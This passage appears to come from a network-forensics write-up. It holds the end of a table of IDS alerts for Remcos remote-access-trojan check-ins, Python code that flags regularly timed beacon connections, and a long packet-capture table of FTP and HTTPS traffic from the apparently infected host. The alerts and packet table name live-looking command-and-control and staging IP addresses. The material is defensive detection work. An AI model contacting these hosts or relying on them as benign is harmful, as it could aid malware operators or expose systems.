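2024-10-03T09:30:04.608519+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49772|212.162.149.163|2404|TCP
2024-10-03T09:30:06.843533+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49773|212.162.149.163|2404|TCP
2024-10-03T09:30:09.080687+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49774|212.162.149.163|2404|TCP
2024-10-03T09:30:09.446203+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49774|212.162.149.163|2404|TCP
2024-10-03T09:30:12.762607+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49775|212.162.149.163|2404|TCP
2024-10-03T09:30:15.640291+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49776|212.162.149.163|2404|TCP
"""


def parse_alerts(table: str) -> list[dict]:
    """Parse pipe-delimited alert rows into dicts with typed fields."""
    rows = []
    for line in table.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport, proto = (c.strip() for c in line.split("|"))
        rows.append({
            # %z accepts the +0200 offset form used by the report
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "sig": sig, "sev": int(sev),
            "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport),
            "proto": proto,
        })
    return rows


def connections(rows: list[dict]) -> list[dict]:
    """Keep the first alert per TCP connection (same 5-tuple): several
    signature hits on one connection are not separate check-ins."""
    seen, first = set(), []
    for r in sorted(rows, key=lambda r: r["ts"]):
        key = (r["proto"], r["src"], r["sport"], r["dst"], r["dport"])
        if key not in seen:
            seen.add(key)
            first.append(r)
    return first


def beacon_candidates(rows: list[dict], min_conns: int = 5, max_cv: float = 0.25) -> list[dict]:
    """Group connections by (src, dst, dport, signature) and flag groups whose
    inter-arrival times are regular, i.e. pstdev/mean <= max_cv.
    min_conns and max_cv are illustrative thresholds (assumption)."""
    groups = defaultdict(list)
    for r in connections(rows):
        groups[(r["src"], r["dst"], r["dport"], r["sig"])].append(r["ts"])
    flagged = []
    for (src, dst, dport, sig), times in groups.items():
        if len(times) < min_conns:
            continue
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(deltas)
        cv = pstdev(deltas) / avg if avg else float("inf")
        if cv <= max_cv:
            flagged.append({"src": src, "dst": dst, "dport": dport, "sig": sig,
                            "connections": len(times),
                            "mean_interval": round(avg, 3),
                            "median_interval": round(median(deltas), 3),
                            "cv": round(cv, 3)})
    return flagged


if __name__ == "__main__":
    rows = parse_alerts(ALERT_TABLE)
    print(f"{len(rows)} alerts, {len(connections(rows))} distinct connections")
    for c in beacon_candidates(rows):
        print(f"beacon-like: {c['src']} -> {c['dst']}:{c['dport']} "
              f"every ~{c['mean_interval']}s (cv={c['cv']}) [{c['sig']}]")
```

On these rows the 18 connections arrive with a mean gap of about 2.5 s and a coefficient of variation near 0.13, so the group is flagged. On production traffic the same logic needs an allow-list for legitimate periodic traffic (update checks, monitoring agents), and a median-based jitter measure is more robust than pstdev when a single long gap, like the 3.7 s one after the 49774 connection, would otherwise skew the score.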
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 3, 2024 09:28:08.891669989 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:08.896445990 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:08.896521091 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:09.531840086 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:09.532802105 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:09.537705898 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:09.761440039 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:09.761626005 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:09.766535044 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:09.999851942 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.000066996 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.004821062 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.227607965 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.227845907 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.232769966 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.455776930 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.455993891 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.460851908 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.683629036 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.683801889 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.688628912 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.912352085 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.914901018 CEST  49712        60575      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.919806957 CEST  60575        49712      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:10.919882059 CEST  49712        60575      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.919930935 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:10.924963951 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.149014950 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.196043968 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:11.544876099 CEST  60575        49712      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.545053959 CEST  60575        49712      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.545134068 CEST  49712        60575      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:11.545571089 CEST  21           49711      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.549118996 CEST  49712        60575      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:11.553966045 CEST  60575        49712      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:11.586855888 CEST  49711        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:11.608588934 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:11.608624935 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:11.608684063 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:11.646555901 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:11.646579027 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.109671116 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.109818935 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.112806082 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.112823009 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.113068104 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.139806986 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.183404922 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.500199080 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.500251055 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.500277042 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.500340939 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.500360012 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.500436068 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.560185909 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560271978 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560306072 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560326099 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.560349941 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560395956 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.560401917 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560561895 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.560643911 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.560651064 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587677956 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587717056 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587745905 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587770939 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587769032 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.587794065 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.587833881 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.587833881 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.587841988 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.588444948 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.588522911 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.588558912 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.588568926 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.588812113 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.647597075 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.647752047 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.647820950 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.647836924 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.647864103 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.648159981 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.648173094 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.648344040 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.648425102 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.648437023 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.648443937 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.648524046 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.648529053 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649075031 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649159908 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649239063 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649276972 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.649276972 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.649283886 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649358034 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649559975 CEST  443          49713      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:12.649575949 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.649712086 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:12.662879944 CEST  49713        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:14.802938938 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:14.807708025 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:14.807776928 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:15.422820091 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:15.423199892 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:15.427993059 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:15.645931959 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:15.646159887 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:15.651171923 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:15.877351046 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:15.877927065 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:15.882762909 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.100557089 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.101016998 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.105786085 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.517503023 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.518407106 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.523849010 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.740761995 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.741871119 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.747898102 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.966068983 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.967703104 CEST  49716        60261      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.972691059 CEST  60261        49716      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:16.974225998 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.974229097 CEST  49716        60261      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:16.979078054 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.197835922 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.243405104 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:17.583909035 CEST  21           49715      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.584928989 CEST  60261        49716      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.585225105 CEST  60261        49716      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.585292101 CEST  49716        60261      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:17.585670948 CEST  49716        60261      192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:17.585973024 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:17.586019993 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:17.586110115 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:17.586318016 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:17.586333036 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:17.590461969 CEST  60261        49716      191.252.83.213   192.168.2.6
Oct 3, 2024 09:28:17.633517981 CEST  49715        21         192.168.2.6      191.252.83.213
Oct 3, 2024 09:28:18.062920094 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.073282957 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.073319912 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.472790956 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.472840071 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.472883940 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.472894907 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.472923040 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.473001957 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.533848047 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.534034014 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.534063101 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.534102917 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.534116983 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.534149885 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.534645081 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.535691023 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.535696983 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.563505888 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.563539028 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.563565016 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.563576937 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.563637972 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.563644886 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.564223051 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.564254999 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.564255953 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.564265013 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.564295053 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.564318895 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.624938011 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.624975920 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.624979019 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.624989033 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625025034 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.625030994 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625060081 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625271082 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.625277996 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625684977 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625714064 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625739098 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.625744104 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625770092 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.625771046 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625782967 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.625818968 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.626441002 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.626496077 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.626559019 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.626693010 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.626698971 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.626734018 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.627213955 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654504061 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654561996 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654575109 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.654581070 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654611111 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.654614925 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654684067 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.654777050 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.654782057 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655030966 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655059099 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655061960 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.655067921 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655097008 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.655100107 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655159950 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655481100 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.655488014 CEST  443          49717      188.114.97.3     192.168.2.6
Oct 3, 2024 09:28:18.655503988 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.655527115 CEST  49717        443        192.168.2.6      188.114.97.3
Oct 3, 2024 09:28:18.950031996 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:18.950083971 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:18.950141907 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:18.950499058 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:18.950510025 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.516593933 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.516674995 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.518420935 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.518431902 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.518699884 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.519681931 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.563405037 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.627548933 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.627576113 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.627640009 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.627661943 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.632256031 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.632332087 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.632360935 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.710259914 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.710355997 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.710386992 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.710454941 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.710464954 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.710515022 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.710521936 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.711512089 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.711551905 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.711569071 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.711591005 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.711644888 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.717022896 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.717045069 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.717087030 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.717133999 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.798819065 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.798839092 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.798896074 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.798911095 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.798923969 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.798969984 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.799972057 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.800034046 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.800532103 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.800595045 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.801254988 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.801311016 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.802136898 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.802191973 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.802212954 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.802265882 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.805404902 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.805476904 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.887180090 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.887274981 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.887444019 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.887509108 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.887756109 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.887808084 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.888039112 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.888092995 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.888170958 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.888231039 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.888952971 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889005899 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.889061928 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889118910 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.889735937 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889806032 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.889868975 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889908075 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889920950 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.889928102 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.889954090 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.889985085 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.890770912 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.890856981 CEST  49719        443        192.168.2.6      173.231.247.100
Oct 3, 2024 09:28:19.890919924 CEST  443          49719      173.231.247.100  192.168.2.6
Oct 3, 2024 09:28:19.890966892 CEST  49719        443        192.168.2.6      173.231.247.100
